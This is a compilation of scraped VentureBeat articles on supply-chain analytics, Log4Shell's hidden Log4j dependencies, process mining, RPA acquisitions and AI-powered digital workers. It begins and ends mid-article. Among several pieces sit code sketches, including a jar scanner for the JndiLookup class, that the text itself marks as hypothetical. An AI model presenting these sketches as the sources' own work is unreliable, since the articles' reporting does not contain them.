As a result, supply-chain managers now are placing bets that may determine, in large measure, the fate of their companies. They’re desperate for visibility into all links in the chain – using portals many have never had before – but a number of them are flying blind with little or no control over the flow of their goods. Supply-chain managers struggle with how best to view and control logistics to get goods trapped in millions of 40×8-foot containers on ships waiting off ports in Oakland, Los Angeles, Long Beach, the eastern seaboard, and the Suez Canal onto trucks and trains and out to retailers. Solutions for this include those from companies such as SAP, Cin7, Oracle NetSuite, InfoPlus, and Anvyl. These suppliers make complex collections of point products that include controls for demand forecasting and management of import/export, inventory, shipping, suppliers, transportation, and warehousing. These mostly legacy applications can be difficult to use because they weren’t designed with optimal usability in mind. The good news is that there’s innovation happening in this market.

Welcome unified data analytics

Relative newcomer Incorta, which makes a software-as-a-service (SaaS)-based unified data analytics platform that includes the above functions, comes at the supply chain from a different perspective. Its single-screen platform puts all a company’s data into a single system, replacing various separate tools, to move data from source locations into a form that both line-of-business staff members and data scientists can use more effectively. This is the data analysis that’s used to project and/or identify supply-chain snags and find ways to solve them, similar to the way GPS routes drivers around traffic snarls. “Incorta builds and deploys machine-learning models,” CIO Brian Keare told VentureBeat.
“That’s in great part because our unified data analytics platform enables you to directly analyze raw, untransformed data – which is exactly the kind of data that is needed for machine learning. “This has several implications: to begin with, it brings business analytics and data science together into closer alignment because both can operate on the same platform and work with the exact same data. For data scientists, that means no more developing models in a bubble and no more running with unrealistic data sets that ultimately fail in production. What’s more, it means that data scientists don’t have to spend so much time acquiring data, building a pipeline, and transferring results to another system to visualize and share results – a lot of this ‘grunt work’ is handled by the platform.” “You can take a look at what your alternatives are, given that you’re out of stock on certain things,” Keare said. “Say your goods are stuck on ships waiting to clear customs off the Port of Los Angeles. As opposed to a bunch of manual spreadsheets and trying to figure it out manually, you’ve got just one pane-of-glass view of what’s going on, and you can really look at what your alternatives are.”

How the AI is implemented

To help technologists, data architects, and software developers learn more about how to use AI, VentureBeat asked Keare how the product applies AI.

VentureBeat: What AI and ML tools are you using specifically?

Brian Keare: Incorta’s unified data analytics platform bundles in and tightly integrates Spark, so that any library – whether open source or commercial – can be used with it. Incorta also ships out of the box with favorites such as scikit-learn, Spark ML, FBProphet (Facebook Prophet), and others. We also have utility libraries that make it easy to retrieve data from Incorta, save data frames back to Incorta, and then examine and visualize intermediate results in our embedded notebook interface.
VentureBeat: Are you using models and algorithms out of a box — for example, from DataRobot or other sources?

Keare: Incorta is a platform for analytics and developing ML models. We include some common Python libraries, but we also have a data API that can be used with external notebooks and third-party ML tools like DataRobot, Dataiku, H2O, and others. As a unified platform, Incorta is built with open standards and easily integrates with cloud-friendly tools and platforms.

VentureBeat: What cloud service are you using mainly?

Keare: Incorta is currently hosted on the Google Cloud Platform by default and other cloud services on request. We’re working with the other cloud vendors to make their platforms a turnkey, user-selectable option.

VentureBeat: Are you using a lot of the AI workflow tools that come with that cloud?

Keare: Incorta provides data scientists with an end-to-end platform that can be used to build AI workflows. More specifically, Incorta ingests data and then provides that data to a Spark-based ML/AI workflow. You can easily incorporate external tools as well, including other AI tools in the cloud.

VentureBeat: How much do you do yourselves?

Keare: Incorta takes data that is ingested into our UDAP (unified data analytics platform) and makes it available to the ML/AI workflows developed within the Incorta product.

VentureBeat: How are you labeling data for the ML and AI workflows?

Keare: The ML workflow, including data labeling, is typically done using notebooks, which are then executed within the platform. These notebooks can be scheduled and orchestrated against other platform operations like data extraction.

VentureBeat: Can you give us a ballpark estimate on how much data you are processing?

Keare: While we don’t specifically track and measure how much data Incorta processes, we’re speaking with customers all the time, and there are many who are processing many billions of rows of data every day using our platform.
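The interview doesn’t show any of Incorta’s code; purely as a hypothetical sketch of the kind of notebook analysis Keare describes, the snippet below fits a least-squares trend to toy weekly demand and flags a stock-out risk. Every name and number here is invented for illustration.

```python
# Hypothetical supply-chain notebook sketch: aggregate weekly demand,
# fit a simple least-squares trend, and flag a SKU whose projected
# demand outruns inventory on hand plus inventory in transit.
from statistics import mean

def fit_trend(series):
    """Ordinary least-squares line through (index, value) points."""
    n = len(series)
    xs = range(n)
    x_bar, y_bar = mean(xs), mean(series)
    slope = sum((x - x_bar) * (y - y_bar) for x, y in zip(xs, series)) / \
            sum((x - x_bar) ** 2 for x in xs)
    return slope, y_bar - slope * x_bar

def forecast(series, weeks_ahead):
    """Extrapolate the fitted trend `weeks_ahead` past the last observation."""
    slope, intercept = fit_trend(series)
    return intercept + slope * (len(series) - 1 + weeks_ahead)

weekly_units = [120, 135, 150, 160, 180, 190]  # toy demand history
on_hand, in_transit = 150, 80                  # toy inventory positions

projected = forecast(weekly_units, weeks_ahead=4)
at_risk = projected > on_hand + in_transit     # stock-out risk flag
```

In a production setting this trivial trend line would be replaced by a real forecasting model (Prophet, Spark ML, or scikit-learn, per the libraries Keare names), but the shape of the analysis is the same: history in, projection out, compared against inventory.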
Some of the most valuable companies in the world today are Incorta customers. Incorta is used by companies such as Starbucks, Broadcom, Duluth Trading Co., and Shutterfly."
15,122
2,021
"'Less obvious' uses of Log4j pose a major risk | VentureBeat"
"https://venturebeat.com/2021/12/13/less-obvious-uses-of-log4j-pose-a-major-risk"
"‘Less obvious’ uses of Log4j pose a major risk

Log4Shell, the Apache Log4j vulnerability that has sent every security team scrambling since its disclosure on Thursday, brings massive cybersecurity risk because the flaw is so easy to exploit and the usage of Log4j is widespread in software. But the wide deployment of Log4j, on its own, is not why the Log4Shell flaw is so troubling. The most concerning part may be the fact that much of Log4j’s usage is essentially buried, making it extraordinarily difficult to detect and fix. Log4j is an open source logging library that is often packaged in with other pieces of software to make those additional pieces work. But in many cases, there are no real or obvious boundaries between Log4j and the pieces of software it powers, said John Hammond, senior security researcher at Huntress.
“Log4j is versatile and makes up an important foundational block for lots of software — and it’s those less obvious pieces that make this such a troublesome situation,” Hammond said. “The way that Log4j is packaged up with other software or programs makes it harder to spot which applications may potentially be vulnerable.”

Hard to detect

Research from Snyk has found that among Java applications using Log4j, 60% use the logging library “indirectly” — meaning that they use a Java framework that contains Log4j rather than directly using Log4j itself.

“That does indeed make it harder to detect that you’re using it — and harder to remediate,” said Guy Podjarny, cofounder and president of Snyk. The Log4Shell vulnerability impacts a broad swath of enterprise software and cloud services, and many applications written in Java are potentially vulnerable. The remote code execution (RCE) vulnerability can ultimately enable an attacker to remotely access and control devices. Researchers have disclosed exploits so far including deployment of malware and installation of Cobalt Strike, a popular tool with cybercriminals that is often seen as a precursor to deploying ransomware.

Hiding in code

Internal research from Wiz suggests that more than 89% of all environments have vulnerable Log4j libraries, according to Wiz cofounder and chief technology officer Ami Luttwak. And “in many of them, the dev teams are sure they have zero exposure — and are surprised to find out that some third-party component is actually built using Java,” Luttwak said.
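Snyk’s 60% figure is about transitive dependencies: an application that never declares log4j-core in its own build file can still ship it. A toy resolver makes the mechanics plain; the package names and graph below are illustrative, not a real project’s manifest.

```python
# Toy dependency graph: "my-app" never names log4j-core directly, but a
# framework starter it depends on pulls the library in transitively.
DEPS = {
    "my-app": ["spring-boot-starter-log4j2", "commons-lang3"],
    "spring-boot-starter-log4j2": ["log4j-core", "log4j-api"],
    "log4j-core": [],
    "log4j-api": [],
    "commons-lang3": [],
}

def transitive_deps(pkg, graph):
    """Walk the graph depth-first and collect everything `pkg` pulls in."""
    seen = set()
    stack = list(graph.get(pkg, []))
    while stack:
        dep = stack.pop()
        if dep not in seen:
            seen.add(dep)
            stack.extend(graph.get(dep, []))
    return seen

direct = set(DEPS["my-app"])
indirect = transitive_deps("my-app", DEPS) - direct
```

A search of the app’s own dependency list would come up clean, yet `log4j-core` lands in the `indirect` set, which is exactly why teams that are “sure they have zero exposure” keep getting surprised.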
Dor Dali, director of information security at Vulcan Cyber, agreed that the widespread adoption of Log4j “makes it likely that it is hiding in a lot of code.” While not unique to the Log4j situation, “developers not fully knowing what software they are running” is an issue likely to be exposed again by this vulnerability, Dali said. The whole objective of development libraries, of course, is to make a developer’s life easier by reducing the repetitive tasks and providing some abstraction, said Vitor Ventura, senior security researcher at Cisco Talos. However, in this situation, “it is perfectly feasible that the developer doesn’t know that Log4j is being used on some of the components they are using, whether it is a library or an application server,” Ventura said.

Fix what you know

Casey Ellis, founder and chief technology officer at Bugcrowd, said that during the initial phases of responding to the vulnerability, “it’s important to focus on what you ‘do’ know and ‘can’ fix first.” “But organizations — especially larger ones — would be wise to operate on the assumption that they have unknown vulnerable Log4j in their environment, and make plans to mitigate the risks created by these as well,” Ellis said. Controls that can help reduce the risk posed by “shadow” Log4j include blocking known malicious Log4Shell attempts using web application firewall (WAF) technology and other similar filtering technology, as well as egress filtering of outbound connections at the firewall and internal DNS, according to Ellis. Inbound filtering will deal with the noise and limit the ability of a casual attacker to land an exploit on an unknown Log4j instance, and egress filtering will limit the impact of data exfiltration — or retrieval of a second-stage payload — should an attacker be successful against a vulnerable instance, he said.
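One widely used heuristic for hunting “shadow” Log4j on disk is to treat every .jar as the zip archive it is and look for the JndiLookup class that Log4Shell abuses, recursing into jars nested inside other jars (fat and shaded jars). A sketch in Python; note that finding the class flags a candidate but does not by itself prove a vulnerable Log4j version is present.

```python
import io
import os
import zipfile

# The class Log4Shell abuses; shipped inside log4j-core jars.
MARKER = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def jar_has_jndilookup(data: bytes) -> bool:
    """True if the jar bytes, or any jar nested inside them, contain
    the JndiLookup class."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                if name == MARKER:
                    return True
                if name.endswith(".jar") and jar_has_jndilookup(zf.read(name)):
                    return True
    except zipfile.BadZipFile:
        pass  # not actually a zip archive; skip it
    return False

def scan(root):
    """Yield paths of candidate archives found under `root`."""
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.endswith((".jar", ".war", ".ear")):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    if jar_has_jndilookup(fh.read()):
                        yield path
```

The recursion into nested jars matters: a Spring Boot fat jar or a shaded jar buries log4j-core a level down, which is exactly the “buried” usage the researchers above describe.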
Layered defense Davis McCarthy, principal security researcher at Valtix, said businesses should stick to the principles of layered defense and assume that it’s not “if” but “when” you get hacked. Along with WAF technology, another approach for “virtual patching” can include implementing an intrusion prevention system (IPS), McCarthy said. Businesses should also enable workload segmentation and traffic filtering to ensure that only allowed connections happen to and from their applications, he said. “It often takes weeks or longer to patch a vulnerability like this, and we haven’t necessarily seen the worst of it,” McCarthy said. In a world where vendors “don’t report or aren’t even aware of all the software used in their solutions, defenders must fall back to detection and response,” said Rick Holland, chief information security officer at Digital Shadows. Zero-trust principles of network segmentation, monitoring, and least privilege are the controls that defenders must leverage to minimize these risks, Holland said. Software Bill of Materials Longer-term, businesses should collectively pressure vendors to provide a Software Bill of Materials (SBOM), which details all the components in a piece of software, Holland said. SBOMs would help in a situation like this because they would show all of the transitive dependencies of an application, along with the original open source library that was purposefully brought into the app, said Brian Fox, chief technology officer at Sonatype. Ultimately, “if you’re not paying attention to your transitive dependencies, you’re not really protecting yourself fully,” Fox said. “This is a fixable thing though. With the right tools, and automation in place, companies and vendors can stay on top of this. 
And it all starts with a software bill of materials for every single application in your organization.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,123
2,020
"Skan raises $14 million to automate repetitive business processes with computer vision | VentureBeat"
"https://venturebeat.com/2020/10/27/skan-raises-14-million-to-automate-repetitive-business-processes-with-computer-vision"
"Skan raises $14 million to automate repetitive business processes with computer vision Skan.ai , an AI-enabled process discovery and operational intelligence platform, today closed $14 million in funding. The company says the proceeds will be put toward accelerating Skan’s go-to-market and product R&D efforts. Process discovery and automation is understandably big business in the enterprise. Forrester estimates that robotic process automation (RPA) and related subfields created jobs for 40% of companies in 2019. According to a McKinsey survey , at least a third of activities could be automated in about 60% of occupations, which might be why Market and Markets anticipates the RPA market alone will be worth $493 billion by 2022. 
Skan, the brainchild of entrepreneurs Avinash Misra and Manish Garg, combines data engineering with computer vision to synthesize traces of human and screen interactions, uncovering how workloads (e.g., underwriting, sales, customer onboarding, servicing, claims, invoicing, and fulfillment) are performed in an organization. The platform maps processes by observation on digital systems and continuously infers deep process maps. In production, Skan, which works in the cloud or on-premises and doesn’t require access to backend data, places virtual process agents on desktops and captures digital interactions with Citrix terminals, Excel spreadsheets, browsers, notepads, and more using computer vision. The data are analyzed and synthesized to derive a process metamodel. Via this approach, Skan uncovers process permutations to build a picture from the ground up and generates a definition document, which can help automation engineers plan and build bots fit for purpose. Skan also creates “digital twins” of end-to-end value streams, or models tailored for data-driven process analyses. To protect the integrity of these models, Skan says it keeps business data behind enterprise firewalls, anonymizes worker information, and applies “pixel-level” data redaction and masking techniques. It’s an open question whether the Skan platform’s features are differentiating enough to stand out in a crowded field. FortressIQ , an RPA startup that similarly leverages AI to learn business tasks, recently raised $12 million. FortressIQ and Skan compete with Automation Hero , another well-funded RPA company that recently expanded its focus beyond the sales domain. 
That’s not to mention Kryon and Blue Prism , or behemoths in the RPA space like UiPath (which is valued at over $1.2 billion) and Automation Anywhere (valued at over $6.8 billion). That said, Skan claims to have nabbed customers “the world over” with a significant footprint in the banking, financial services, and insurance sectors. While it won’t disclose names, the company says large enterprises collectively investing “billions” of dollars are among the early adopters. “We realized that without understanding processes, their variants, and the resulting operational intelligence, any intervention such as digitalization, automation, and optimization are futile,” Misra said. “There’s often a gap between how we think work gets done in the enterprise versus how it works in practice.” Cathay Innovation led San Francisco-based Skan’s $14 million series A with participation from Citi Ventures and existing investors Zetta Ventures, Bloomberg Beta, Plug and Play Ventures, and Firebolt Ventures. It’s the startup’s first publicly disclosed fundraising round since its founding in September 2018. "
15,124
2,020
"AI jobs in 2021: here are some key trends | VentureBeat"
"https://venturebeat.com/2020/12/28/ai-jobs-in-2021-here-are-some-key-trends"
"Sponsored Jobs AI jobs in 2021: here are some key trends There’s no doubt about it – Artificial Intelligence has been a bit of a buzzword this year. Artificial intelligence has been established as the main driver of emerging technologies such as big data, robotics, and the IoT. So, what do the next 12 months look like for AI? As a result of the global pandemic, consumer trends have changed significantly, which has resulted in some notable trends in the world of AI for 2021… Hyperautomation Hyperautomation is the application of advanced technologies like Artificial Intelligence and machine learning to augment workers and automate processes in ways that are significantly more impactful than traditional automation capabilities. Automated business processes must be able to adapt to changing circumstances and respond to unexpected situations, hence the need for AI. 
This is something we’ll be seeing more of in the new year, no doubt. Ethical AI One of the biggest things we’re expecting in 2021 is a rising demand for the ethical use of Artificial Intelligence. Previously, companies adopted AI and machine learning without much thought for the ethics behind them. But now, consumers and employees expect companies to adopt AI in a responsible manner. Over the next few years, companies will deliberately choose to do business with partners that commit to data ethics and adopt data handling practices that reflect their own values as well as their customers’ values. Workplace AI It is predicted that in 2021, a sizeable number of companies in adaptive and growth mode will look to Artificial Intelligence to help with workplace disruption, both for location-based, physical, or human-touch workers and for knowledge workers working from home. AI will be used for things like customer service agent augmentation, return-to-work health tracking, and intelligent document extraction. Cybersecurity AI constantly finds itself wrapped up in the world of cybersecurity, in both corporate and home settings; an ongoing trend that isn’t going anywhere. AI and machine learning technology can be used in cybersecurity to help identify threats, including variants of earlier threats. AI use will expand to create smart homes where the system learns the ways, habits, and preferences of its occupants – improving its ability to identify intruders and protect the home. Does all of this sound super interesting to you? Then maybe you should consider looking for a job in AI. We have so many exciting opportunities available over on our careers page – head over and have a look now! 
"
15,125
2,021
"Celonis investing heavily to build out process-mining platform | VentureBeat"
"https://venturebeat.com/2021/10/20/celonis-investing-heavily-to-build-out-process-mining-platform"
"Celonis investing heavily to build out process-mining platform Celonis , a Germany-based maker of process-mining tools , has announced several key acquisitions, capabilities, and partnerships involving its core platform. These include the launch of the Celonis Execution Graph, the acquisition of Lenses.io , a maker of streaming data tools, and a partnership with Canada’s Conexiom. Gartner Research has characterized process mining as a core technology for building out the digital twin of an organization. These capabilities allow executives to peer inside business processes, identify inefficiencies, and design more efficient workflows by testing out a twin that doesn’t interfere with operations. These recent moves will make it easier to use graph data and streaming data to extend executable digital twins of an organization across process and even company boundaries. 
Gartner has identified graph data technology as a core component of data fabrics required to build digital twins that tie together data and simulations across different enterprise applications. Celonis CEO Alexander Rinke told VentureBeat he finds it helpful to characterize the company’s approach as an “X-Ray for your business.” New capabilities coming to process mining Process mining has traditionally focused on one process at a time. The adoption of graph technology will make it easier to evaluate trade-offs in optimizing different processes simultaneously. The new Celonis Execution Graph uses graph data structures to tie together data from across business processes to see how they influence each other across systems and suppliers. Noteworthy is a new feature, Multi-Event Log, that spots inefficiencies that cross multiple processes. Maureen Fleming, IDC VP of intelligent process automation research, told VentureBeat via email: “As organizations successfully use process mining to identify inefficiencies in one process, they often have to investigate upstream processes to find the source of the inefficiency. The effort and time value of visualizing and analyzing the impact of interactions in one process to another through automation rather than manual efforts means the time spent in analysis shrinks and more targeted improvement efforts commence more rapidly.” Celonis also acquired Lenses.io to simplify real-time data integration into process mining, analytics, and low-code application development. Lenses took a novel approach to transforming raw real-time streaming data into clear business events. For example, this could help combine weather patterns, raw material access, and social trends to identify when shipments might be late. 
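Celonis has not published the internals of Multi-Event Log, but the underlying idea, correlating events from two processes through a shared key to expose cross-process delays, can be sketched in plain Python. The event logs, field names, and "order completed" activity below are hypothetical:

```python
from datetime import datetime

def cross_process_lag(order_log, invoice_log):
    """For each order, days from order completion (in one process's log)
    to the first invoice event (in another process's log), joined on
    a shared order_id. Events are dicts with ISO-8601 "ts" timestamps."""
    # Earliest invoice event per order.
    first_invoice = {}
    for e in invoice_log:
        ts = datetime.fromisoformat(e["ts"])
        oid = e["order_id"]
        if oid not in first_invoice or ts < first_invoice[oid]:
            first_invoice[oid] = ts
    # Lag between "order completed" and that first invoice event.
    lags = {}
    for e in order_log:
        if e["activity"] == "order completed" and e["order_id"] in first_invoice:
            done = datetime.fromisoformat(e["ts"])
            lags[e["order_id"]] = (first_invoice[e["order_id"]] - done).days
    return lags
```

An unusually large lag for one order points at a cross-process handoff problem that neither single-process log would reveal on its own, which is the kind of inefficiency Fleming describes.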
Celonis hopes to combine this capability with the low-code business execution technology from Integromat , which it acquired a year ago. Fleming said that event stream processing could increase precision and speed problem identification and opportunity detection. This promises to make process mining data more actionable and the results more controllable. The third major announcement was a partnership with Conexiom, a leader in sales order automation services. The companies plan to collaborate on a touchless order-capture product to make it easier to create business processes that span multiple companies. Getting a leg up in hyper-automation Both RPA (robotic process automation) and process mining represent two popular and complementary approaches for automating and reengineering existing business processes in the larger hyper-automation market. RPA platforms help enterprises create bots that mimic the way humans type and click through various business apps. In contrast, process-mining tools analyze enterprise data logs to identify the most promising automation and reengineering opportunities. RPA and process mining vendors are expanding into each other’s territory to become the gateway for hyper-automation initiatives that accelerate digital transformation. For example, Celonis previously acquired Integromat, which automates low-code development opportunities identified with process mining. Conversely, leading RPA vendors such as UiPath, Automation Anywhere , and Blue Prism also have moved into process mining and process discovery. Microsoft is also expanding into both RPA and process mining. These will help Celonis secure a lead against other process-mining vendors and in the larger market for hyper-automation, which Gartner expects to reach $596 billion in 2022. These moves are part of Celonis’s long-term strategy for growing the market for process mining and execution beyond the hot market for RPA. 
"
15,126
2,021
"Automation Anywhere acquires FortressIQ to boost process mining | VentureBeat"
"https://venturebeat.com/2021/12/23/automation-anywhere-acquires-fortressiq-to-boost-process-mining"
"Automation Anywhere acquires FortressIQ to boost process mining Robotic process automation (RPA) company Automation Anywhere today announced that it’s entered into a definitive agreement to acquire FortressIQ , a startup developing automatic process discovery and mining technologies. With this acquisition of FortressIQ, Automation Anywhere will expand its platform with new optimization capabilities that help to identify which software-based processes in an organization can be automated, according to its COO Mike Micucci. “As two cloud-first companies, we … have common customers who we can help scale their digital transformation efforts and who will benefit from our best-of-breed automation technologies,” he told VentureBeat via email. “We believe our acquisition of FortressIQ makes complete business sense. 
We are combining the pioneer in intelligent automation with the pioneer in process discovery — a perfect match.” Mihir Shukla will continue as Automation Anywhere’s chairman and CEO. Pankaj Chowdhry, CEO and founder of FortressIQ, will join Automation Anywhere as EVP and general manager for discovery. Robotic process automation The demand for RPA has grown as companies look for ways to streamline business processes during the pandemic — and as they adopt new digital technologies. RPA promises to automate monotonous, repetitive tasks traditionally performed by human workers, addressing bottlenecks with workflows, data, and documentation while providing audit trails and reducing compliance expenses (and risks). RPA often begins with what’s called task discovery — process mining — where an RPA client spots root cause issues by pulling data from systems including desktop, IT, email apps, and workflows. Task capture is the next step in the onboarding chain, which comes as employees move through a work process that they’d like to automate. “Automation continues to transcend other technologies as organizations pursue digital transformation initiatives,” Micucci said. “As companies continue on their automation journeys, there’s been tremendous interest from customers around process intelligence to help identify, map, and analyze the multi-dimensional processes that extend across hundreds of apps and thousands of employees, as well as the insight into which processes can and should be automated to drive business success.” FortressIQ’s process-mining product taps AI — specifically computer vision and natural language processing — to “learn” business tasks as they occur in real time by analyzing and transcribing footage from a user’s desktop or laptop. 
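FortressIQ's pipeline is proprietary, but once screen recordings have been transcribed into per-case activity sequences, a textbook process-discovery step is to count the directly-follows relation between activities, which is the raw material for a process map. A minimal sketch (the example log is hypothetical):

```python
from collections import Counter

def directly_follows(event_log):
    """Count how often activity a is directly followed by activity b
    within the same case; each case is an ordered list of activities.
    The resulting counts form the edges of a directly-follows graph."""
    counts = Counter()
    for case in event_log:
        for a, b in zip(case, case[1:]):  # consecutive activity pairs
            counts[(a, b)] += 1
    return counts
```

Edges with high counts trace the dominant path through a process, while rare edges expose the permutations and rework loops that automation engineers need to account for before building bots.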
FortressIQ claims that its technology can filter out noise and anonymize the captures to protect privacy. It also doesn’t require APIs, transaction logs, or installation and works with existing free, proprietary, and commercial apps, the company says. Chowdhry got the inspiration for FortressIQ while leading AI at Genpact, a business process outsourcing firm. “We decided to join forces with Automation Anywhere as we thought it was the best way to accelerate our mission to deliver actionable process intelligence. We often heard from customers that one of the hardest problems they encountered was translating a discovered process into an automated one,” he told VentureBeat. “We feel that [Automation Anywhere’s] scale will be transformational for the industry and allow us to turbo charge our customer’s transformation agendas.” Expansion and consolidation Gartner estimates that the market for dedicated process mining tools alone has grown from $110 million in 2018 to more than $320 million today. In a report released last September, analysts at the firm found that the broader RPA market increased at a moderate 19.5%, with total revenue anticipated to reach $2 billion in 2021. Unsurprisingly, major RPA vendors are starting to invest in building out process mining. Automation Anywhere rival UiPath developed some of its own tools before buying Process Gold and StepShot for their process mining capabilities. Blue Prism recently released a task mining solution called Capture, while other vendors including ABBYY and Kryon are slowly expanding their own process mining offerings. “Demand for RPA and intelligent automation has skyrocketed as the pandemic endures and organizations have looked to automation for business resiliency, to support remote workers and streamline business,” Micucci said. 
“With this acquisition, we will add new capabilities from FortressIQ with built-in intelligence to our automation platform and create a joint roadmap that focuses on making AI-powered process discovery and process intelligence more robust. This will enable customers to speed and scale their automation journey.” But Automation Anywhere’s acquisition comes at a time when the industry appears to be headed toward general consolidation — despite the vast amounts of capital being invested in it. In late January, SAP acquired German process automation company Signavio, just before ServiceNow got into the RPA segment with the buyout of India-based Intellibot.io. In April, IBM acquired process mining software company MyInvenio. Salesforce’s MuleSoft and Microsoft followed suit with the purchases of automation technology providers Servicetrace and Clear Software , respectively. Still, Automation Anywhere rival UiPath — which recently filed to go public — believes the total global RPA market to be around $60 billion currently. In a sliver of supporting evidence, Automation Anywhere claimed last November that it was on track to reach profitability for the first time. “While RPA firms aspire for dominance, exits await Blue Prism, Automation Anywhere, UiPath, WorkFusion and a gallery of other RPA companies,” The Last Futurist’s Michael Spencer wrote in a recent analysis. “Sprawling technology platforms can acquire these RPA startups and turn them into automation software that’s profitable and will rapidly consolidate the entire sector.” 
"
15,127
2,022
"The Great Resignation gives birth to digital employees powered by AI, ML, and RPA | VentureBeat"
"https://venturebeat.com/2022/02/07/the-great-resignation-gives-birth-to-digital-employees-powered-by-ai-ml-and-rpa"
"The Great Resignation gives birth to digital employees powered by AI, ML, and RPA Meet Tara. A transaction screening analyst, Tara has daily tasks that include continuously reviewing alert messages, examining alert reviews and dispositions, cross-referencing messages with third-party tools such as Google or OpenCorporates.com, and tuning systems to improve automation rates. “My role is to make flags on potential risky transactions, whether they come from individuals or institutions,” Tara explains, emphasizing the critical nature of regulatory adherence. “Sanctions are serious business. 
This is really important work.” Tara is a sophisticated bot — complete with a name, face, personality, CV, and deep industry expertise and experience. She is one of six digital “colleagues” that have been developed and deployed by intelligent automation and robotic process automation (RPA) company WorkFusion. Welcome to the new digital workforce “Enterprises today in every sector are facing the greatest labor shortage in history, and it’s even more difficult to source, hire, and train knowledge workers who can perform complex jobs that require numerous daily data-driven decisions,” said WorkFusion CEO Adam Famularo. He pointed to the so-called “Great Resignation” and, particularly in the insurance and financial sectors, increasing regulatory pressure. Businesses can expand their team’s capacity with “digital colleagues who never get tired, can’t be distracted, and perform flawlessly.” Companies across numerous industries are increasingly relying on digital workers to automate and streamline various tasks — and, in turn, these virtual employees powered by AI, machine learning, RPA, and analytics are becoming even more advanced. According to Forrester’s “Future of Work,” automation will transform 80% of jobs in some way by 2030. More Fortune 1000 company executives are going to look to AI, bots, robots, and smart technologies to address the employee experience, compensation, and regulatory pressures, Forrester anticipates. WorkFusion is one of a growing number of companies going beyond traditional RPA to meet this demand. Others in the space include Digital Workforce, Thoughtful Automation, and Tangentia. New York City-based WorkFusion today announced the release of its new AI-powered digital workforce, which uses intelligent automation to work alongside human teams in banking, finance, insurance, and other industries. 
As Famularo explained, these new “team members” arrive on the job fully trained, are immediately productive, and can work independently or under supervision (what’s known as “human-in-the-loop” interaction). And they are given human personas. The company hired actors to represent them, so they all have a face, as well as names, titles, previous work experiences, and extensive lists of complex skills. Prospective customers can view their CVs on WorkFusion’s website and can also watch short videos in which they explain their roles and expertise. According to Famularo, this human portrayal of digital workers was driven by WorkFusion customers. “To be able to have a name and a face makes it easier to interact with them and associate them with the work that they do,” he said. “It is this digital workforce that is going to come to life.” Meet Tara’s AI-powered colleagues In addition to Tara, the company developed Ilana, an insurance underwriter who collects, reviews, and analyzes new business applications, qualifies accounts, and enters quotes into the company’s quoting and rating system, as well as Kendrick, a customer ID program analyst who reviews customer identity documents for quality assurance and ensures that proof of identity is captured and entered into company databases. Other digital team members include Evelyn, a sanction screening analyst; Darryl, a customer due diligence program analyst; and Casey, a customer service coordinator. WorkFusion expects to deploy additional digital workers later this year: Carlos, a customer outreach analyst; Isaac, an investigations analyst; Laticia, a lending operations analyst; and Shawn, a sales operations analyst. WorkFusion’s focus on financial services and insurance dictated the initial grouping. “We wanted to make sure we were deep and rich in skill sets specific for financial services and insurance,” he said. 
The goal is to “go deep and rich with a specific job role, then enable that job role to traverse industries in the future,” Famularo said.

These digital workers can be deployed as-is, or companies can customize them so that they are unique to their businesses and processes. One or one hundred Kendricks or Caseys can be integrated into business functions, Famularo said. They are scalable, and their AI core continuously learns and improves with every assignment and interaction. Whether they work in secure on-premises, private cloud, managed services cloud, or SaaS environments, the WorkFusion Network allows them to share insights, skills, and knowledge, which in turn enables continuous enhancement and updating. The network also aggregates performance results so that companies can assess their effectiveness. “It is a self-learning ecosystem of digital workers,” Famularo said.

He emphasized that this virtual workforce supplements human workers by shouldering heavy loads and enabling their human counterparts to tackle more impactful, high-level tasks and projects. Reading and dissecting emails and documents, and assessing whether a transaction should be completed, are “all things we can do better with a digital workforce,” he said.

In developing these virtual workers, WorkFusion built on its decade of experience automating complex operational functions. The differentiator, according to Famularo, is that they fully automate an entire job role and leverage deep machine learning to constantly enhance themselves. They can be up and running in a short period of time, shortening time to value while reducing costs, speeding compliance, and enhancing customer and employee experiences. “They are full-scale digital knowledge workers; they can do full work,” Famularo said. As more companies integrate its initial six workers, WorkFusion will continue to fine-tune and grow their skill sets and interaction abilities.
“It’s this network effect of self-learning: five, six, seven, eight of the same Tara can be working for several companies today,” Famularo said. And as they work, WorkFusion can “gather up intelligence, establish a model behind what they’re doing and how they’re doing it.” More digital employees on the job means that the WorkFusion platform grows smarter and smarter. “Every Evelyn that’s out there is making us better,” Famularo said.

Ultimately, “companies are all starved for talent,” he added. The question WorkFusion is striving to answer is this: “How do you use a digital workforce to take the work?”

VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. VentureBeat Homepage Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,128
2,021
"The perils of personal data | VentureBeat"
"https://venturebeat.com/2021/12/15/the-perils-of-personal-data"
"The perils of personal data

This article was contributed by Anselmo Diaz, principal consultant and associate lecturer.

Data isn’t new. Since ancient times, people have recorded facts for inventory purposes, to carve events into the annals of history, and for everything else our ancestors deemed important. The need to preserve information, coupled with advances in technology, has made data ubiquitous in modern societies. In fact, technology makes the creation, processing, and sharing of data such a common activity that people have stopped paying much attention to it.

Data explosion

Data is everywhere, and we interact with it in numerous ways: credit cards, identification documents, medical records, CCTV footage, digital photographs, emails, social media, and more.
The list is truly endless and is constantly expanding with the use of the Internet of Things (IoT), smartphones, and wearable technologies, to name a few. It is estimated that in 2021, the amount of data generated daily surpassed 2.5 quintillion bytes, which is 25 followed by a staggering 17 zeros. Most of that is stored in immense server farms or in the cloud.

